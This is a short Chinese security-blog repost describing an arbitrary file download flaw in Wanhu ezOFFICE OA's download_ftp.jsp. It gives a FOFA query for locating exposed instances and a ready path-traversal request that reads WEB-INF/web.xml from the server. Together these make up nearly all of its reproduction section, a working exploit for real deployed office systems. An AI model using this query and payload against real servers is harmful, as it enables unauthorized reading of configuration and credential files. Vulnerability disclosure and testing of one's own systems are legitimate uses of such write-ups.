万户OA download_ftp.jsp 任意文件下载漏洞

本文转载于公众号:融云攻防实验室,原文地址:

万户OA download_ftp.jsp 任意文件下载漏洞

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

万户软件网络是业内普遍认可的智慧政务办公专家,OA系统国家行业标准编制组长单位,协同软件国家行业标准编制组长单位,22年专注协同管理领域.为您提供定制化的智慧政务一体化办公解决方案。万户OAdownload_ftp.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。

图片[1]-万户OA download_ftp.jsp 任意文件下载漏洞-渗透云记 - 专注于网络安全与技术分享

0x03 漏洞复现

fofaapp=”万户网络-ezOFFICE”

1.执行POC,读取成功web.xml文件成功

/defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml
图片[2]-万户OA download_ftp.jsp 任意文件下载漏洞-渗透云记 - 专注于网络安全与技术分享
© 版权声明
THE END
喜欢就支持一下吧
点赞5 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容